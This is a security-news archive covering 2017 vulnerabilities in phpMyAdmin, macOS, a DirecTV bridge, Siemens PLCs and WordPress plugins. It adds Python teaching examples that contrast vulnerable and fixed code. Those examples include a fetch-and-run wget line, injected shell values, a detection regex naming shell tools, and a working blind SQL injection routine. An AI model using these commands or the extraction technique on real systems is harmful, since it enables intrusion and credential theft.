Category Archives: Vulnerability Assessment

Oracle Says Nothing on Meltdown or Spectre Vulnerabilities

Oracle is keeping quiet about whether the Meltdown and Spectre vulnerabilities affect its hardware. It has offered the media nothing beyond “no comment”, making it a notable absentee from Intel’s list of x86 vendors publishing advisories on how to handle the two flaws.

Oracle runs an x86 cloud, so its customers would presumably want to know about any imminent disruption or performance degradation. Big Red is also silent on whether Spectre and Meltdown affect its SPARC hardware. Asked about its own SPARC position, Fujitsu told The Reg: “We are in the process of checking the status. Details of updates will continue to be published by Fujitsu as they become available.”

But Oracle’s usual talkativeness about software fixes may have revealed its x86 patch: the company’s pre-release notice for its quarterly Critical Patch Update, due next Tuesday, lists “Oracle X86 Servers, versions SW 1.x, SW 2.x” among the 97 products to be patched.

Sun ZFS Storage Appliance operators have been advised to brace for a severity 10.0 patch, while users of Oracle’s Fusion Middleware, PeopleSoft, Oracle Retail, Virtualization, Communications Applications and the Supply Chain Suite have 9.8-rated bugs to contend with.

Most of the fixes are for applications*, but Solaris 10 and 11.3 made the list too, as did the Java Advanced Management Console and the Java ME SDK.

* Including Oracle’s Cruise Dining Room Management application, the Cruise Fleet Management application and the Cruise Shipboard Property Management System. Who knew those apps even existed?

Critical Vulnerability Reported in phpMyAdmin

An update published just before the holidays by the developers of phpMyAdmin fixes a critical vulnerability that can be exploited to perform damaging database operations by getting targeted administrators to click on specially crafted links.

phpMyAdmin is a free and open source tool for managing MySQL databases over the web. It is one of the most widely used MySQL administration tools, with more than 200,000 downloads per month. Researcher Ashutosh Barot, from India, found that phpMyAdmin is affected by a Cross-Site Request Forgery (CSRF) flaw that an attacker can exploit to drop tables, delete records and perform other database operations.

An authenticated admin needs to click on a specially crafted URL for the attack to work. However, Barot noted that the attack works as long as the user is logged in to the cPanel web hosting administration interface, even if phpMyAdmin has been closed after use. These attacks are possible because vulnerable versions of phpMyAdmin use GET requests for database operations but fail to provide CSRF protection.

The researcher also pointed out that the URLs associated with database operations performed via phpMyAdmin are stored in the browser history, which can pose security risks.

“The URL will contain database name and table name as a GET request was used to perform DB operations,” Barot said in a blog post published on Friday. “URLs are stored at various places such as browser history, SIEM logs, firewall logs, ISP logs, etc. This URL is always visible at client side, it can be a serious issue if you are not using SSL (some information about your previous queries were stored in someone’s logs!). Wherever the URL is being saved, an adversary can gain some information about your database.”

phpMyAdmin developers patched the CSRF vulnerability found by Barot with the release of version 4.7.7. All prior 4.7.x versions are affected by the security hole, which phpMyAdmin has classified as critical. Users are advised to update their installations or apply the available patch.
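The two properties the text says vulnerable versions lacked (no state change on a GET request, and a token that a cross-site page cannot supply) are easy to show side by side. The following is an added example written for this page, not phpMyAdmin’s own code: a toy “drop table” admin endpoint in the forgeable shape, then hardened. The Session and Request types, the handler names and the URL in the docstring are constructed for illustration.

```python
"""Added example, not phpMyAdmin's own code: a toy "drop table" admin endpoint,
first in the shape the text describes (a GET request authorized by nothing but
the session cookie, so any page the admin visits can forge it), then hardened
with a POST-only rule and a per-session CSRF token. Session, Request and the
handler names are constructed for illustration."""
import hmac
import re
import secrets
import sqlite3
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple

IDENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]{0,63}$")   # only a plain identifier ever reaches the SQL


@dataclass
class Session:
    sid: str
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(16))


@dataclass
class Request:
    method: str
    params: Dict[str, str]
    cookie_sid: Optional[str] = None   # the browser attaches the cookie to cross-site requests too


def new_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE customers (id INTEGER, name TEXT)")
    return db


def table_exists(db: sqlite3.Connection, name: str) -> bool:
    row = db.execute("SELECT 1 FROM sqlite_master WHERE type='table' AND name=?", (name,)).fetchone()
    return row is not None


def _drop(db: sqlite3.Connection, name: str) -> int:
    if not IDENT.match(name):
        return 400
    db.execute(f'DROP TABLE "{name}"')
    return 200


def drop_table_vulnerable(db, sessions: Dict[str, Session], req: Request) -> int:
    """State change on GET, authorized by the cookie alone: a victim who merely loads an
    attacker page containing <img src="https://host/pma/drop?table=customers"> loses the table."""
    if req.cookie_sid not in sessions:
        return 401
    return _drop(db, req.params.get("table", ""))


def drop_table_hardened(db, sessions: Dict[str, Session], req: Request) -> int:
    """Refuse GET for anything state-changing and require a token that only a page served
    inside the victim's own session could know; compare it in constant time."""
    if req.method != "POST":
        return 405
    sess = sessions.get(req.cookie_sid)
    if sess is None:
        return 401
    given = req.params.get("token", "")
    if not hmac.compare_digest(given.encode(), sess.csrf_token.encode()):
        return 403
    return _drop(db, req.params.get("table", ""))


def demo() -> Dict[str, Tuple[int, bool]]:
    """Replays forged requests against both handlers; each value is (HTTP status, table survived)."""
    victim = Session(sid=secrets.token_hex(8))
    sessions = {victim.sid: victim}
    # Crafted by an attacker who relies on the browser sending the cookie but does not know the token.
    forged_get = Request("GET", {"table": "customers"}, cookie_sid=victim.sid)
    forged_post = Request("POST", {"table": "customers", "token": "guess"}, cookie_sid=victim.sid)
    legit_post = Request("POST", {"table": "customers", "token": victim.csrf_token}, cookie_sid=victim.sid)

    db_vuln = new_db()
    status = drop_table_vulnerable(db_vuln, sessions, forged_get)
    results = {"forged_get_vs_vulnerable": (status, table_exists(db_vuln, "customers"))}

    db_hard = new_db()
    for label, req in (("forged_get_vs_hardened", forged_get),
                       ("forged_post_vs_hardened", forged_post),
                       ("legit_post_vs_hardened", legit_post)):
        status = drop_table_hardened(db_hard, sessions, req)
        results[label] = (status, table_exists(db_hard, "customers"))
    return results
```

Running `demo()` shows the forged GET dropping the table through the first handler (status 200) while the hardened handler answers 405 to the GET, 403 to a POST carrying a guessed token, and only honours the POST that carries the token from the victim’s own session. A SameSite cookie attribute adds a further, browser-enforced layer, but the token check is what does not depend on the client.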

Unpatched macOS Flaw Allows Code Execution, Root Access

A researcher who specializes in hacking Apple’s iOS operating system has publicly disclosed the details of an unpatched vulnerability in macOS that he says can be exploited to take complete control of a system.

The details of the flaw and proof-of-concept (PoC) code were made public on the first day of 2018 by a researcher who uses the online moniker Siguza (s1guza). An attacker who has access to a system can leverage the vulnerability, which the expert has described as a “zero day,” to execute arbitrary code and obtain root privileges.

The local privilege escalation (LPE) vulnerability affects IOHIDFamily, a kernel extension designed for Human Interface Devices (HID), such as a touchscreen or buttons. While looking for flaws that would let him hack the iOS kernel, Siguza noticed that some components of this extension, specifically IOHIDSystem, exist only on macOS, which led him to identify a potentially serious security hole.

The researcher found that the bugs affect all versions of macOS and that they can lead to an arbitrary read/write primitive in the kernel. The exploit he developed also disables the System Integrity Protection (SIP) and Apple Mobile File Integrity (AMFI) security features. However, the researcher pointed out that his exploit, dubbed IOHIDeous, is not silent, as it needs to force a logout of the logged-in user. Alternatively, an attacker could develop an exploit that is triggered when the targeted device is shut down manually or rebooted.

Some of the PoC code made available by Siguza only works on macOS High Sierra 10.13.1 and earlier, but the researcher believes the exploit can be tweaked to work on the latest version as well, namely 10.13.2, which Apple released on December 6, 2017. The expert believes the vulnerability has been around since at least 2002, but some clues suggest it could actually be a decade older than that. “One tiny, ugly bug. Fifteen years. Full system compromise,” Siguza said.

The researcher said he would have reported his findings to Apple instead of making them public if the flaw had been remotely exploitable or if the tech giant’s bug bounty program covered macOS.

SecurityWeek has reached out to Apple for comment and will update this article if the company responds. Some may argue that making the exploit public puts macOS users at risk of attacks, but Siguza believes that is not the case.

Dangerous Zero-Day Allows Remote ‘Root’ Hacking of AT&T DirecTV WVB Devices

Zero-Day Initiative (ZDI) researchers have disclosed an unpatched critical vulnerability affecting a wireless video bridge used by DirecTV that allows an attacker to remotely execute code on vulnerable devices.

The security vulnerability was found in the Linksys WVBR0-25 wireless video bridge, which was designed to pair with the Wireless Genie Mini (C41W) cable box to ensure communication with DirecTV’s main Genie DVR. Trend Micro DVLabs researcher Ricky Lawshae found the vulnerability, which is tracked as CVE-2017-17411 and carries a CVSS score of 10. Lawshae says that authentication is not required to exploit the vulnerability for arbitrary code execution.

“The specific flaw exists within the web management portal. The issue lies in the lack of proper validation of user data before executing a system call. An attacker could leverage this vulnerability to execute code with root privileges,” a ZDI advisory reads.

Lawshae also found that when browsing to the web server on the device, instead of a login prompt or an index page, the service would serve “the output of several diagnostic scripts containing just about everything you could want to know about the bridge, including the WPS pin, connected clients, running processes, and much more.”

Not only is this an information disclosure issue, but the log file also revealed the commands being executed and the output of each command. Furthermore, it showed that the user’s IP address and user-agent were being used in a system command as a method of access logging or tracking.

However, the device does not properly sanitize the user-agent it is given, and the researcher was able to modify the user-agent and pass untrusted data to the system for execution. What Lawshae found was that the system executed the command as root, with no login prompt or input filtering before passing the value to the process responsible for its execution. Since the lighttpd process runs with root privileges, the executed commands run with root privileges as well, even when they originate from untrusted input.

“It literally took 30 seconds of looking at this device to find and verify an unauthenticated remote root command injection vulnerability,” Lawshae says.

After performing a deeper analysis of the device, the researcher found that it was running a lighttpd web server. It was configured to fetch a SysInfo.asp file when browsing to the root of the website, and this file was the page displaying all the diagnostic output.

“It also showed dispatcher.cgi was actually a symbolic link to apply.cgi, which itself is a compiled ARC executable file used as kind of a “do everything” agent for the web server. It was in apply.cgi that I found the actual root cause,” Lawshae, who also published a video detailing the vulnerability, explains.

ZDI attempted to work with Linksys to address the vulnerability, but to no avail. The company has not even acknowledged it, despite being informed of the bug in June, which led ZDI to publish the 0-day report. SecurityWeek has contacted Linksys for a statement on the issue but has not received a response yet. We’ll update the article as soon as we hear back from them.

“In the absence of an actual patch from the vendor, users should protect themselves by limiting the devices that can interact with the WVBR0-25 to those that actually need to reach it,” Lawshae concludes.
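The root cause Lawshae describes, a request header spliced into a shell command that runs as the web server’s user, is worth seeing in code. What follows is an added example written for this page, not the WVBR0-25 firmware or the ZDI proof of concept: a reconstruction of that access-logging pattern, the request that turns it into command execution, the fix, and a log-triage heuristic. The log path, the header values and the sample log lines are constructed; it assumes a POSIX `sh`.

```python
"""Added example, not the WVBR0-25 firmware or ZDI's PoC. It reconstructs the
pattern the text describes: a web front end splices the client IP and
User-Agent into a shell command for access logging. Log path, header
values and the sample log lines are constructed for illustration."""
import os
import re
import subprocess
import tempfile


def log_access_vulnerable(ip: str, user_agent: str, logfile: str) -> str:
    # The header text becomes part of the command line, so the shell parses it as code.
    # Whatever user the web server runs as (root on the bridge) runs the injected commands.
    cmd = f'echo "{ip} {user_agent}" >> {logfile}'
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout.strip()


def log_access_hardened(ip: str, user_agent: str, logfile: str) -> str:
    # Keep a shell (as a small CGI might) but pass the header as a positional parameter:
    # "$2" is expanded as data by the shell and never re-parsed as a command.
    script = r'printf "%s %s\n" "$1" "$2" >> "$3"'
    proc = subprocess.run(["sh", "-c", script, "sh", ip, user_agent, logfile],
                          capture_output=True, text=True)
    return proc.stdout.strip()


# Heuristic for SIEM-side triage: legitimate User-Agents contain ';' and parentheses,
# so flag only constructs that make sense mainly as shell syntax.
SHELL_INJECTION = re.compile(r"`|\$\(|\|\||&&|\|\s*\w|[<>]|;\s*(?:sh|bash|wget|curl|nc|telnet|rm|cat)\b")


def suspicious_user_agents(log_lines):
    """Returns the combined-format log lines whose User-Agent field looks like shell injection."""
    hits = []
    for line in log_lines:
        quoted = re.findall(r'"((?:[^"\\]|\\.)*)"', line)   # request, referer, user-agent
        if len(quoted) >= 3 and SHELL_INJECTION.search(quoted[2]):
            hits.append(line)
    return hits


SAMPLE_LOG = [  # constructed lines in combined log format
    '203.0.113.9 - - [13/Dec/2017:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/57.0"',
    '203.0.113.9 - - [13/Dec/2017:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0; wget http://203.0.113.9/d -O /tmp/d; sh /tmp/d"',
    '198.51.100.7 - - [13/Dec/2017:10:00:03 +0000] "GET /SysInfo.asp HTTP/1.1" 200 8192 "-" "x$(id)"',
]


def demo():
    """Runs the same injected User-Agent through both loggers and returns what happened."""
    payload = 'Mozilla/5.0"; echo INJECTED; echo "'
    with tempfile.TemporaryDirectory() as tmp:
        log = os.path.join(tmp, "access.log")
        vuln_stdout = log_access_vulnerable("203.0.113.9", payload, log)
        with open(log) as fh:
            vuln_log = fh.read()
        os.remove(log)
        hard_stdout = log_access_hardened("203.0.113.9", payload, log)
        with open(log) as fh:
            hard_log = fh.read()
    return {"vuln_stdout": vuln_stdout, "vuln_log": vuln_log,
            "hard_stdout": hard_stdout, "hard_log": hard_log}
```

With the vulnerable logger the `echo INJECTED` from the header runs and its output lands on stdout, and the log file ends up holding only an empty line; with the hardened logger nothing runs and the log holds the header verbatim, payload and all. `suspicious_user_agents` flags the second and third sample lines and leaves the ordinary Firefox string alone; it is a heuristic, so tune the word list to what your fleet actually sees.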

Serious Flaw Found in Many Siemens Industrial Products

Several products manufactured by Siemens are affected by a vulnerability that can be exploited by a remote attacker to cause systems to enter a denial-of-service (DoS) condition.

The flaw, tracked as CVE-2017-12741 and rated “high severity,” was reported to Siemens by George Lashenko of industrial cybersecurity firm CyberX.

According to Siemens, the list of affected products includes SIMATIC S7-200 Smart micro-PLCs for small automation applications, SIMATIC S7 CPUs, SIMATIC WinAC RTX software controllers, SIMATIC ET 200 PROFINET interface modules, SIMATIC PN/PN couplers, SIMATIC Compact field units, development kits for PROFINET IO, SIMOTION motion control systems, SINAMICS converters, SINUMERIK CNC automation solutions, SIMOCODE motor management systems, and SIRIUS 3RW motor soft starters.

An attacker can cause affected systems to crash by sending them specially crafted packets via UDP port 161, which is used by the Simple Network Management Protocol (SNMP). Recovering from the DoS condition requires a manual restart of the device. The mitigating factors section of Siemens’ advisory notes that the attacker needs network access to exploit the flaw, and that the vendor instructs organizations to operate these devices only in trusted environments.

However, CyberX told SecurityWeek that there are roughly 2,000 Siemens devices reachable from the Internet, including about 400 with an exposed SNMP port, which could make them vulnerable to the company’s exploit.

“DoS vulnerabilities shouldn’t be taken lightly,” CyberX said. “The December 2016 attack on the Ukrainian electrical grid used this type of exploit to disable protection relays and make it more difficult for operators to recover.”

The security firm said Siemens was very responsive to its vulnerability report. The vendor has released firmware updates that fix the flaw in some SIMATIC S7, EK-ERTEC, SIMOTION and SINAMICS products. Until patches become available for the other affected products, Siemens recommends disabling SNMP, which fully mitigates the vulnerability, restricting network access to port 161, applying defense-in-depth and cell protection concepts, and using VPNs.

Cisco Patches Multiple Critical WebEx Vulnerabilities

Cisco has released updates for various components of its WebEx online video conferencing and meeting platform to fix multiple vulnerabilities, including critical flaws that can be exploited for remote code execution.

A total of six vulnerabilities affecting the WebEx Network Recording Player for Advanced Recording Format (ARF) and WebEx Recording Format (WRF) files have been classified as critical. The affected player is used to play back recorded WebEx meetings, conferences and seminars. It can be installed automatically when a recording file hosted on a WebEx server is opened.

The security holes affecting the Network Recording Player can be exploited by a remote attacker to cause a denial-of-service (DoS) condition in the software and possibly execute arbitrary code by getting the targeted user to open specially crafted ARF or WRF files. Cisco noted that the attacker can send the malicious files to victims via email or get them to open a web page hosting the files.

Cisco has fixed the vulnerabilities in WebEx Business Suite meeting and conference sites, WebEx Meetings sites, WebEx Meetings Server, and the WebEx ARF and WRF Players. Cisco’s advisory provides complete information on affected versions and the availability of patches. The CVE identifiers assigned are CVE-2017-12367, CVE-2017-12368, CVE-2017-12369, CVE-2017-12370, CVE-2017-12371 and CVE-2017-12372.

The flaws were reported to Cisco by Andrea Micalizzi (rgod) and Steven Seeley of Offensive Security via Trend Micro’s Zero Day Initiative (ZDI), by Fortinet’s Kushal Arvind Shah, and by Qihoo 360 researcher Yihan Lian. ZDI has yet to make public its advisories for the flaws found by Seeley and Micalizzi.

Cisco has no indication that the vulnerabilities have been exploited in malicious attacks.

Lian also found a medium severity DoS vulnerability in the WebEx Network Recording Player. A remote attacker can cause the player to crash by getting the targeted user to open a malicious WRF file.

The networking giant published four additional advisories describing WebEx vulnerabilities on Wednesday. These weaknesses have also been rated “medium severity” and they include cross-site scripting (XSS) and URL redirection vulnerabilities in WebEx Meeting Center, an information disclosure bug in Event Center, and a flaw that can be exploited to modify the welcome message in Meeting Server.

Google Reveals Details of $100K Chrome OS Flaws

Google has publicly disclosed the details of a code execution exploit chain for Chrome OS that earned a researcher $100,000. In March 2015, Google announced its intention to offer up to $100,000 for an exploit chain that would lead to a persistent compromise of a Chromebox or Chromebook in guest mode via a web page. Prior to that, the company had offered $50,000 for such an exploit.

A researcher who uses the online moniker Gzob Qq informed Google on September 18 that he had identified a series of vulnerabilities that could lead to persistent code execution on Chrome OS, the operating system running on Chromebox and Chromebook devices. The exploit chain consists of an out-of-bounds memory access flaw in the V8 JavaScript engine (CVE-2017-15401), a privilege escalation in PageState (CVE-2017-15402), a command injection flaw in the network_diag component (CVE-2017-15403), and symlink traversal issues in crash_reporter (CVE-2017-15404) and cryptohomed (CVE-2017-15405).

Gzob Qq provided Google with a proof-of-concept exploit tested on Chrome 60 and Chrome OS platform version 9592.94.0. Google patched the vulnerabilities on October 27 with the release of Chrome OS 62 platform version 9901.54.0/1, which also addressed the recently disclosed KRACK vulnerabilities. On October 11, Google informed the researcher that he had earned the $100,000 Pwnium reward. Pwnium was a one-day hacking competition that Google organized every year alongside the CanSecWest conference until February 2015, when it decided to turn Pwnium into a year-round program.

Gzob Qq’s initial report, which describes the complete exploit chain, was made public by Google last week, along with the advisory for each of the vulnerabilities it involves. This was not the first time the researcher received a $100,000 reward from Google. Roughly one year ago, he reported a similar Chrome OS exploit chain for which he earned the same amount. Another researcher, George Hotz, earned $150,000 at the Pwnium competition back in 2014 for a persistent Chrome OS exploit.

WordPress Sites Exposed to Attacks via ‘Formidable Forms’ Flaws

A researcher has found vulnerabilities in a popular WordPress plugin that malicious actors can exploit to gain access to sensitive data and take control of affected websites.

Formidable Forms is a WordPress plugin that allows users to easily create contact pages, polls and surveys, and other types of forms. The plugin is available in both a free version and a paid version that offers additional features, and it has more than 200,000 active installations. Jouko Pynnönen of the Finnish company Klikki Oy analyzed the plugin and found several vulnerabilities, including ones that pose a critical security risk to the websites using it. The flaw with the highest severity is a blind SQL injection that can allow attackers to enumerate a website’s databases and obtain their content. Exposed data includes WordPress user credentials and data submitted to a website via Formidable forms.

The researcher also found another flaw that exposes data submitted via Formidable forms. Both this and the SQL injection bug are related to Formidable’s implementation of shortcodes, WordPress-specific markup that lets users add various types of content to their websites with very little effort. Pynnönen also discovered reflected and stored cross-site scripting (XSS) vulnerabilities. The stored XSS allows an attacker to execute arbitrary JavaScript code in the context of the administrator’s browsing session: the attacker injects the malicious code via forms and it executes when the website administrator views it in the WordPress dashboard.

The expert also noticed that if the iThemes Sync WordPress maintenance plugin is present alongside Formidable Forms, an attacker can use the aforementioned SQL injection flaw to obtain a user’s ID and an authentication key. This data can be used to control WordPress via iThemes Sync, including to add new admins or install plugins. Formidable Forms addressed the vulnerabilities with the release of versions 2.05.02 and 2.05.03. iThemes Sync does not consider the attack vector described by the researcher to be a vulnerability, so it did not release a patch.
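A blind SQL injection leaks data even though the page never echoes query results: the attacker only needs a yes/no difference in the rendered output. The following is an added example written for this page, not Formidable Forms code. It models a hypothetical `[entries id="..."]` shortcode whose attribute is spliced into SQL, runs a boolean-based blind extraction through it that recovers a password hash from a user table, and shows the parameterized fix. The table and column names, the shortcode and the sample rows are constructed for illustration.

```python
"""Added example, not Formidable Forms code: a toy shortcode handler that splices
its attribute into SQL, the boolean-based blind extraction an attacker can run
through it, and the parameterized fix. Table/column names, the shortcode and the
sample rows are constructed for illustration."""
import re
import sqlite3
from typing import Callable

SHORTCODE = re.compile(r'\[entries\s+id="([^"]*)"\]')   # hypothetical shortcode: [entries id="7"]


def seed_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE wp_users (ID INTEGER, user_login TEXT, user_pass TEXT);
        INSERT INTO wp_users VALUES (1, 'admin', '$P$BnotArealHash');
        CREATE TABLE frm_items (id INTEGER, form_id INTEGER, name TEXT);
        INSERT INTO frm_items VALUES (1, 7, 'contact'), (2, 7, 'survey');
    """)
    return db


def render_vulnerable(db: sqlite3.Connection, content: str) -> str:
    """Expands [entries id="..."] by splicing the attribute into SQL unquoted."""
    def expand(m):
        sql = f"SELECT COUNT(*) FROM frm_items WHERE form_id = {m.group(1)}"
        return str(db.execute(sql).fetchone()[0])
    return SHORTCODE.sub(expand, content)


def render_fixed(db: sqlite3.Connection, content: str) -> str:
    """Same shortcode, but the attribute is coerced to an int and bound as a parameter."""
    def expand(m):
        try:
            form_id = int(m.group(1))
        except ValueError:
            return "[invalid form id]"
        row = db.execute("SELECT COUNT(*) FROM frm_items WHERE form_id = ?", (form_id,)).fetchone()
        return str(row[0])
    return SHORTCODE.sub(expand, content)


def blind_extract(ask: Callable[[str], bool], subquery: str, max_len: int = 64) -> str:
    """Boolean-based blind SQL injection: recover the value of `subquery` one character
    at a time using nothing but yes/no answers from the injection point."""
    length = next((n for n in range(1, max_len + 1) if ask(f"LENGTH(({subquery})) = {n}")), 0)
    chars = []
    for i in range(1, length + 1):
        lo, hi = 32, 126                    # printable ASCII; binary search on the code point
        while lo < hi:
            mid = (lo + hi) // 2
            if ask(f"UNICODE(SUBSTR(({subquery}), {i}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        chars.append(chr(lo))
    return "".join(chars)


def demo():
    """Leaks a hash through the vulnerable renderer and shows the fixed one rejecting the payload."""
    db = seed_db()
    queries = {"n": 0}

    def ask(cond: str) -> bool:
        # Form 7 has two entries, so the page renders "2" when cond holds and "0" when it does not.
        queries["n"] += 1
        return render_vulnerable(db, f'[entries id="7 AND ({cond})"]') != "0"

    leaked = blind_extract(ask, "SELECT user_pass FROM wp_users WHERE ID = 1")
    return {
        "leaked": leaked,
        "queries": queries["n"],
        "fixed_output": render_fixed(db, '[entries id="7 AND (1=1)"]'),
        "legit_fixed": render_fixed(db, 'Entries so far: [entries id="7"]'),
    }
```

`demo()` recovers the 16-character hash in roughly 130 requests: one linear probe for the length, then a binary search over the printable range for every position, which is why “the page only shows a count” is no defence. The fixed renderer refuses anything that is not an integer and binds the value, so the same attribute renders as `[invalid form id]` while a legitimate `[entries id="7"]` still works.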

Pynnönen identified these flaws after being invited to participate in a HackerOne-hosted bug bounty program that offers rewards of up to $10,000. The program is run by an unnamed tech company based in Singapore, but the Formidable Forms vulnerabilities qualified for a bounty because the plugin was in use on the firm’s site. Exploitation of the flaws on the tech firm’s website could have allowed an attacker to obtain access to personal information and other sensitive data.

The researcher received roughly $4,500 for the SQL injection vulnerability and a few hundred dollars for each of the other security holes. However, he is disappointed that the Singapore-based company downplayed the risks posed by the flaws and reduced the severity of the SQL injection bug from “critical” to “high”.

Pynnönen previously found critical vulnerabilities in Yahoo Mail, WordPress plugins and the WordPress core.

VMware Patches vCenter Server Vulnerabilities

VMware has patched moderate severity vulnerabilities in its vCenter Server management software that can be exploited for information disclosure and remote denial-of-service (DoS) attacks.

The first flaw, tracked as CVE-2017-4927, is related to how vCenter Server handles specially crafted LDAP network packets. An attacker can exploit the vulnerability remotely to cause a DoS condition. A Fortinet researcher reported the vulnerability in January, but it was only confirmed in April and patched a few months later. Fortinet has published its own advisory for the security hole and assigned it a risk rating of 3/5.

The issue affects vCenter Server 6.0 and 6.5 on any platform and it has been addressed with the release of versions 6.0 U3c and 6.5 U1. The second vulnerability, CVE-2017-4928, affects the Flash-based vSphere Web Client; VMware pointed out that the HTML5-based application is not impacted. This CVE identifier has actually been assigned to two weaknesses found by a Tencent researcher in the product: a server-side request forgery (SSRF) issue and a CRLF injection bug.

“An attacker may exploit these issues by sending a POST request with modified headers towards internal services leading to information disclosure,” VMware said in its advisory.

vCenter Server 5.5 and 6.0 are affected, and patches are included in versions 5.5 U3f and 6.0 U3c. VMware’s disclosure of the vulnerabilities coincides with the release of vCenter Server 6.0 U3c. The other versions that include patches for these security holes, 5.5 U3f and 6.5 U1, were made available in mid-September and late July, respectively. Version 6.5 U1 also patched a moderate severity stored cross-site scripting (XSS) vulnerability in the vCenter Server H5 Client. The flaw can be exploited by an authenticated attacker to execute malicious JavaScript code in the targeted user’s context.

Versions 5.5, 6.0 and 6.5 of vCenter Server are also affected by a bug that allows an attacker with limited user privileges to abuse an API in order to access the guest operating system without authentication. The flaw was disclosed in late July at the Black Hat security conference in Las Vegas, but VMware has so far only provided workarounds for it.

Numerous Vulnerabilities Discovered in Linux Kernel USB Subsystem

Andrey Konovalov, a researcher at Google, has found a significant number of vulnerabilities in the Linux kernel USB subsystem using Google’s syzkaller fuzzer. The fuzzing tool helped Konovalov find dozens of bugs, including 22 security flaws that have been assigned CVE identifiers. The expert published detailed information this week on 14 of the vulnerabilities he discovered.

Konovalov described the vulnerabilities as use-after-free, general protection fault, out-of-bounds read and NULL pointer dereference issues that can be exploited to cause a denial-of-service (DoS) condition. The expert added that some of the flaws might have a different impact as well, which typically means they could allow arbitrary code execution.

The researcher pointed out that an attacker needs physical access to the targeted system and must connect a malicious USB device in order to exploit the vulnerabilities. Others have suggested that an attacker who has remote access to a machine may be able to update the firmware on connected USB drives to deploy exploits for these flaws and create malicious devices.

Konovalov said fixes for many of the vulnerabilities are included in Linux kernel versions 4.13.4 and later, but several issues remain unpatched. Linux distributions do not appear too concerned about these security holes and have assigned them low severity ratings.

This is not the first time the Google researcher has found flaws in the Linux kernel. In February, he reported a locally exploitable code execution flaw that had been present in the kernel for more than eleven years. That double-free vulnerability (CVE-2017-6074) was also discovered using the syzkaller fuzzer. In May, he disclosed the details of a privilege escalation bug that could be exploited via packet sockets. An analysis of many CVEs conducted last year showed that the average lifetime of a Linux kernel vulnerability is roughly five years.